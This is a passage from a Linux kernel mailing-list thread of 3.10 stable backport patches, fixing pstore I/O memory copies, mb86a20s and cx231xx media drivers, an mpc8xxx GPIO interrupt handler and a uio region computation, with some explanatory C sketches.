  2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
                   ` (24 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Furquan Shaikh, Enric Balletbo Serra, Kees Cook, Willy Tarreau

From: Furquan Shaikh <furquan@google.com>

commit 7e75678d23167c2527e655658a8ef36a36c8b4d9 upstream.

persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.

Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index ee3c6ec..eb42483 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -263,7 +263,7 @@ static void notrace persistent_ram_update(struct persistent_ram_zone *prz,
 	const void *s, unsigned int start, unsigned int count)
 {
 	struct persistent_ram_buffer *buffer = prz->buffer;
-	memcpy(buffer->data + start, s, count);
+	memcpy_toio(buffer->data + start, s, count);
 	persistent_ram_update_ecc(prz, start, count);
 }
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (193 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
                   ` (23 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrew Bresticker, Enric Balletbo Serra, Kees Cook, Willy Tarreau

From: Andrew Bresticker <abrestic@chromium.org>

commit d771fdf94180de2bd811ac90cba75f0f346abf8d upstream.

The ramoops buffer may be mapped as either I/O memory or uncached
memory.  On ARM64, this results in a device-type (strongly-ordered)
mapping.  Since unaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.
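
To make "only aligned accesses" concrete, the sketch below shows one
way such a copy can be structured: byte accesses until the source is
8-byte aligned, then naturally aligned 64-bit loads, then a byte tail.
This is an illustration under that assumption, not the kernel's
memcpy_fromio(); copy_from_aligned() is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Copy `count` bytes from `from` to `to` so that every access to the
 * source is naturally aligned for its width.
 */
static void copy_from_aligned(void *to, const volatile void *from,
			      size_t count)
{
	unsigned char *d = to;
	const volatile unsigned char *s = from;

	/* Head: single bytes until the source address is 8-byte aligned. */
	while (count && ((uintptr_t)s & 7)) {
		*d++ = *s++;
		count--;
	}

	/* Body: aligned 64-bit loads from the source. */
	while (count >= 8) {
		uint64_t v = *(const volatile uint64_t *)s;

		memcpy(d, &v, sizeof(v));	/* destination is normal memory */
		d += 8;
		s += 8;
		count -= 8;
	}

	/* Tail: remaining bytes, one at a time. */
	while (count) {
		*d++ = *s++;
		count--;
	}
}
```

A plain memcpy() makes no such promise about the width or alignment of
its loads, which is why it is not safe on a device-type mapping.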

Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index eb42483..7df456d 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -286,8 +286,8 @@ void persistent_ram_save_old(struct persistent_ram_zone *prz)
 	}
 
 	prz->old_log_size = size;
-	memcpy(prz->old_log, &buffer->data[start], size - start);
-	memcpy(prz->old_log + size - start, &buffer->data[0], start);
+	memcpy_fromio(prz->old_log, &buffer->data[start], size - start);
+	memcpy_fromio(prz->old_log + size - start, &buffer->data[0], start);
 }
 
 int notrace persistent_ram_write(struct persistent_ram_zone *prz,
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 296/319] mb86a20s: fix the locking logic
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (194 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
                   ` (22 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit dafb65fb98d85d8e78405e82c83e81975e5d5480 upstream.

On this frontend, it takes a while to start outputting normal
TS data. That only happens in state S9. In S8, the TS output
is enabled, but it is not reliable enough.

However, the zigzag loop is too fast to let it sync.

Since, in practical tests, the zigzag software loop doesn't
seem to be helping, but just slowing down the tuning, let's
switch to the hardware algorithm, as the tuners used on such
devices are capable of working with frequency drifts without
any help from software.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/dvb-frontends/mb86a20s.c | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
index 2c7217f..3fbac5f 100644
--- a/drivers/media/dvb-frontends/mb86a20s.c
+++ b/drivers/media/dvb-frontends/mb86a20s.c
@@ -321,7 +321,11 @@ static int mb86a20s_read_status(struct dvb_frontend *fe, fe_status_t *status)
 	if (val >= 7)
 		*status |= FE_HAS_SYNC;
 
-	if (val >= 8)				/* Maybe 9? */
+	/*
+	 * Actually, on state S8, it starts receiving TS, but the TS
+	 * output is only on normal state after the transition to S9.
+	 */
+	if (val >= 9)
 		*status |= FE_HAS_LOCK;
 
 	dev_dbg(&state->i2c->dev, "%s: Status = 0x%02x (state = %d)\n",
@@ -2080,6 +2084,11 @@ static void mb86a20s_release(struct dvb_frontend *fe)
 	kfree(state);
 }
 
+static int mb86a20s_get_frontend_algo(struct dvb_frontend *fe)
+{
+        return DVBFE_ALGO_HW;
+}
+
 static struct dvb_frontend_ops mb86a20s_ops;
 
 struct dvb_frontend *mb86a20s_attach(const struct mb86a20s_config *config,
@@ -2153,6 +2162,7 @@ static struct dvb_frontend_ops mb86a20s_ops = {
 	.read_status = mb86a20s_read_status_and_stats,
 	.read_signal_strength = mb86a20s_read_signal_strength_from_cache,
 	.tune = mb86a20s_tune,
+	.get_frontend_algo = mb86a20s_get_frontend_algo,
 };
 
 MODULE_DESCRIPTION("DVB Frontend module for Fujitsu mb86A20s hardware");
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 297/319] mb86a20s: fix demod settings
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (195 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
                   ` (21 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream.

With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
was still using experimental transmissions.

Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.

Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/dvb-frontends/mb86a20s.c | 92 ++++++++++++++++------------------
 1 file changed, 42 insertions(+), 50 deletions(-)

diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
index 3fbac5f..4a1346f 100644
--- a/drivers/media/dvb-frontends/mb86a20s.c
+++ b/drivers/media/dvb-frontends/mb86a20s.c
@@ -75,25 +75,27 @@ static struct regdata mb86a20s_init1[] = {
 };
 
 static struct regdata mb86a20s_init2[] = {
-	{ 0x28, 0x22 }, { 0x29, 0x00 }, { 0x2a, 0x1f }, { 0x2b, 0xf0 },
+	{ 0x50, 0xd1 }, { 0x51, 0x22 },
+	{ 0x39, 0x01 },
+	{ 0x71, 0x00 },
 	{ 0x3b, 0x21 },
-	{ 0x3c, 0x38 },
+	{ 0x3c, 0x3a },
 	{ 0x01, 0x0d },
-	{ 0x04, 0x08 }, { 0x05, 0x03 },
+	{ 0x04, 0x08 }, { 0x05, 0x05 },
 	{ 0x04, 0x0e }, { 0x05, 0x00 },
-	{ 0x04, 0x0f }, { 0x05, 0x37 },
-	{ 0x04, 0x0b }, { 0x05, 0x78 },
+	{ 0x04, 0x0f }, { 0x05, 0x14 },
+	{ 0x04, 0x0b }, { 0x05, 0x8c },
 	{ 0x04, 0x00 }, { 0x05, 0x00 },
-	{ 0x04, 0x01 }, { 0x05, 0x1e },
-	{ 0x04, 0x02 }, { 0x05, 0x07 },
-	{ 0x04, 0x03 }, { 0x05, 0xd0 },
+	{ 0x04, 0x01 }, { 0x05, 0x07 },
+	{ 0x04, 0x02 }, { 0x05, 0x0f },
+	{ 0x04, 0x03 }, { 0x05, 0xa0 },
 	{ 0x04, 0x09 }, { 0x05, 0x00 },
 	{ 0x04, 0x0a }, { 0x05, 0xff },
-	{ 0x04, 0x27 }, { 0x05, 0x00 },
+	{ 0x04, 0x27 }, { 0x05, 0x64 },
 	{ 0x04, 0x28 }, { 0x05, 0x00 },
-	{ 0x04, 0x1e }, { 0x05, 0x00 },
-	{ 0x04, 0x29 }, { 0x05, 0x64 },
-	{ 0x04, 0x32 }, { 0x05, 0x02 },
+	{ 0x04, 0x1e }, { 0x05, 0xff },
+	{ 0x04, 0x29 }, { 0x05, 0x0a },
+	{ 0x04, 0x32 }, { 0x05, 0x0a },
 	{ 0x04, 0x14 }, { 0x05, 0x02 },
 	{ 0x04, 0x04 }, { 0x05, 0x00 },
 	{ 0x04, 0x05 }, { 0x05, 0x22 },
@@ -101,8 +103,6 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x04, 0x07 }, { 0x05, 0xd8 },
 	{ 0x04, 0x12 }, { 0x05, 0x00 },
 	{ 0x04, 0x13 }, { 0x05, 0xff },
-	{ 0x04, 0x15 }, { 0x05, 0x4e },
-	{ 0x04, 0x16 }, { 0x05, 0x20 },
 
 	/*
 	 * On this demod, when the bit count reaches the count below,
@@ -156,42 +156,36 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x50, 0x51 }, { 0x51, 0x04 },		/* MER symbol 4 */
 	{ 0x45, 0x04 },				/* CN symbol 4 */
 	{ 0x48, 0x04 },				/* CN manual mode */
-
+	{ 0x50, 0xd5 }, { 0x51, 0x01 },
 	{ 0x50, 0xd6 }, { 0x51, 0x1f },
 	{ 0x50, 0xd2 }, { 0x51, 0x03 },
-	{ 0x50, 0xd7 }, { 0x51, 0xbf },
-	{ 0x28, 0x74 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xff },
-	{ 0x28, 0x46 }, { 0x29, 0x00 }, { 0x2a, 0x1a }, { 0x2b, 0x0c },
-
-	{ 0x04, 0x40 }, { 0x05, 0x00 },
-	{ 0x28, 0x00 }, { 0x2b, 0x08 },
-	{ 0x28, 0x05 }, { 0x2b, 0x00 },
+	{ 0x50, 0xd7 }, { 0x51, 0x3f },
 	{ 0x1c, 0x01 },
-	{ 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x1f },
-	{ 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x18 },
-	{ 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x12 },
-	{ 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x30 },
-	{ 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x37 },
-	{ 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
-	{ 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x09 },
-	{ 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x06 },
-	{ 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7b },
-	{ 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x76 },
-	{ 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7d },
-	{ 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x08 },
-	{ 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0b },
-	{ 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
-	{ 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf2 },
-	{ 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf3 },
-	{ 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x05 },
-	{ 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
-	{ 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
-	{ 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xef },
-	{ 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xd8 },
-	{ 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xf1 },
-	{ 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x3d },
-	{ 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x94 },
-	{ 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xba },
+	{ 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x03 },
+	{ 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0d },
+	{ 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
+	{ 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x01 },
+	{ 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x21 },
+	{ 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x29 },
+	{ 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
+	{ 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x31 },
+	{ 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0e },
+	{ 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x4e },
+	{ 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x46 },
+	{ 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
+	{ 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x56 },
+	{ 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x35 },
+	{ 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbe },
+	{ 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0x84 },
+	{ 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x03 }, { 0x2b, 0xee },
+	{ 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x98 },
+	{ 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x9f },
+	{ 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xb2 },
+	{ 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0xc2 },
+	{ 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0x4a },
+	{ 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbc },
+	{ 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x04 }, { 0x2b, 0xba },
+	{ 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0x14 },
 	{ 0x50, 0x1e }, { 0x51, 0x5d },
 	{ 0x50, 0x22 }, { 0x51, 0x00 },
 	{ 0x50, 0x23 }, { 0x51, 0xc8 },
@@ -200,9 +194,7 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x50, 0x26 }, { 0x51, 0x00 },
 	{ 0x50, 0x27 }, { 0x51, 0xc3 },
 	{ 0x50, 0x39 }, { 0x51, 0x02 },
-	{ 0xec, 0x0f },
-	{ 0xeb, 0x1f },
-	{ 0x28, 0x6a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
+	{ 0x50, 0xd5 }, { 0x51, 0x01 },
 	{ 0xd0, 0x00 },
 };
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 298/319] cx231xx: don't return error on success
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (196 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
                   ` (20 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 1871d718a9db649b70f0929d2778dc01bc49b286 upstream.

The callers of cx231xx_set_agc_analog_digital_mux_select()
expect it to return 0 or a negative error code. Returning a positive
value makes the first attempt to switch between analog and digital fail.
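
The effect can be illustrated with a small userspace sketch. All names
below are hypothetical stand-ins, not the driver's functions; the only
assumption is a caller that treats any non-zero return as a failure.

```c
/* Old behaviour: hand the raw status (possibly positive) to the caller. */
int mux_select_old(int gpio_status)
{
	return gpio_status;
}

/* Patched behaviour: only negative values are errors, success is 0. */
int mux_select_new(int gpio_status)
{
	if (gpio_status < 0)
		return gpio_status;

	return 0;
}

/* Hypothetical caller that treats any non-zero return code as a failure. */
int caller_sees_failure(int rc)
{
	return rc != 0;
}
```

With a positive status such as 1, the old variant makes the caller see a
failure while the patched variant does not; negative codes pass through
unchanged in both.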

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/cx231xx/cx231xx-avcore.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-avcore.c b/drivers/media/usb/cx231xx/cx231xx-avcore.c
index 235ba65..79a24ef 100644
--- a/drivers/media/usb/cx231xx/cx231xx-avcore.c
+++ b/drivers/media/usb/cx231xx/cx231xx-avcore.c
@@ -1261,7 +1261,10 @@ int cx231xx_set_agc_analog_digital_mux_select(struct cx231xx *dev,
 				   dev->board.agc_analog_digital_select_gpio,
 				   analog_or_digital);
 
-	return status;
+	if (status < 0)
+		return status;
+
+	return 0;
 }
 
 int cx231xx_enable_i2c_port_3(struct cx231xx *dev, bool is_port_3)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (197 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
                   ` (19 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream.

This device uses GPIO 28 to switch between analog and
digital modes; in digital mode, it should be set to 1.

The code that sets it in analog mode is OK, but the logic
that sets it in digital mode is missing.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/cx231xx/cx231xx-cards.c | 2 +-
 drivers/media/usb/cx231xx/cx231xx-core.c  | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-cards.c b/drivers/media/usb/cx231xx/cx231xx-cards.c
index 13249e5..c13c323 100644
--- a/drivers/media/usb/cx231xx/cx231xx-cards.c
+++ b/drivers/media/usb/cx231xx/cx231xx-cards.c
@@ -452,7 +452,7 @@ struct cx231xx_board cx231xx_boards[] = {
 		.output_mode = OUT_MODE_VIP11,
 		.demod_xfer_mode = 0,
 		.ctl_pin_status_mask = 0xFFFFFFC4,
-		.agc_analog_digital_select_gpio = 0x00,	/* According with PV cxPolaris.inf file */
+		.agc_analog_digital_select_gpio = 0x1c,
 		.tuner_sif_gpio = -1,
 		.tuner_scl_gpio = -1,
 		.tuner_sda_gpio = -1,
diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c
index 4ba3ce0..6f5ffcc 100644
--- a/drivers/media/usb/cx231xx/cx231xx-core.c
+++ b/drivers/media/usb/cx231xx/cx231xx-core.c
@@ -723,6 +723,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
 			break;
 		case CX231XX_BOARD_CNXT_RDE_253S:
 		case CX231XX_BOARD_CNXT_RDU_253S:
+		case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
 			errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 1);
 			break;
 		case CX231XX_BOARD_HAUPPAUGE_EXETER:
@@ -747,7 +748,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
 		case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
 		case CX231XX_BOARD_HAUPPAUGE_USB2_FM_PAL:
 		case CX231XX_BOARD_HAUPPAUGE_USB2_FM_NTSC:
-		errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
+			errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
 			break;
 		default:
 			break;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (198 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
                   ` (18 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Liu Gang, Linus Walleij, Willy Tarreau

From: Liu Gang <Gang.Liu@nxp.com>

commit d71cf15b865bdd45925f7b094d169aaabd705145 upstream.

From the beginning of gpio-mpc8xxx.c, "handle_level_irq"
has been used to handle GPIO interrupts on the PowerPC/Layerscape
platforms. But actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.

So "handle_level_irq" is not appropriate for PowerPC/Layerscape
GPIO interrupts; it should be "handle_edge_irq". Otherwise the system
may lose some interrupts from the pin's state changes.

Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpio/gpio-mpc8xxx.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/gpio/gpio-mpc8xxx.c b/drivers/gpio/gpio-mpc8xxx.c
index 2aa3ca2..d5376aa 100644
--- a/drivers/gpio/gpio-mpc8xxx.c
+++ b/drivers/gpio/gpio-mpc8xxx.c
@@ -295,7 +295,7 @@ static int mpc8xxx_gpio_irq_map(struct irq_domain *h, unsigned int virq,
 		mpc8xxx_irq_chip.irq_set_type = mpc8xxx_gc->of_dev_id_data;
 
 	irq_set_chip_data(virq, h->host_data);
-	irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_level_irq);
+	irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_edge_irq);
 
 	return 0;
 }
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 301/319] uio: fix dmem_region_start computation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (199 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
                   ` (17 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Viktorin, Willy Tarreau

From: Jan Viktorin <viktorin@rehivetech.com>

commit 4d31a2588ae37a5d0f61f4d956454e9504846aeb upstream.

The variable i contains the total number of resources (including
IORESOURCE_IRQ). However, we want the dmem_region_start to point
after the last resource of type IORESOURCE_MEM. The original behaviour
leads (very likely) to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from the uiomem
which points to the last used UIO mapping.
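
The difference between the loop index and the number of mappings
actually filled can be shown with a simplified userspace sketch. The
types and names are hypothetical and only mimic the shape of the probe
loop; they are not the driver's code.

```c
#include <stddef.h>

enum res_type { RES_MEM, RES_IRQ };	/* hypothetical, simplified resource types */

#define MAX_MAPS 5			/* hypothetical size of the mapping table */

struct map { int used; };

/* Walk all resources, filling one mapping slot per memory resource. */
void scan_resources(const enum res_type *res, size_t n, struct map *maps,
		    size_t *loop_index, size_t *maps_used)
{
	struct map *cur = maps;
	size_t i;

	for (i = 0; i < n; ++i) {
		if (res[i] != RES_MEM)
			continue;	/* IRQ entries advance i but not cur */
		if (cur >= &maps[MAX_MAPS])
			break;
		cur->used = 1;
		++cur;
	}

	*loop_index = i;			/* what the old code stored */
	*maps_used = (size_t)(cur - &maps[0]);	/* what the fix stores */
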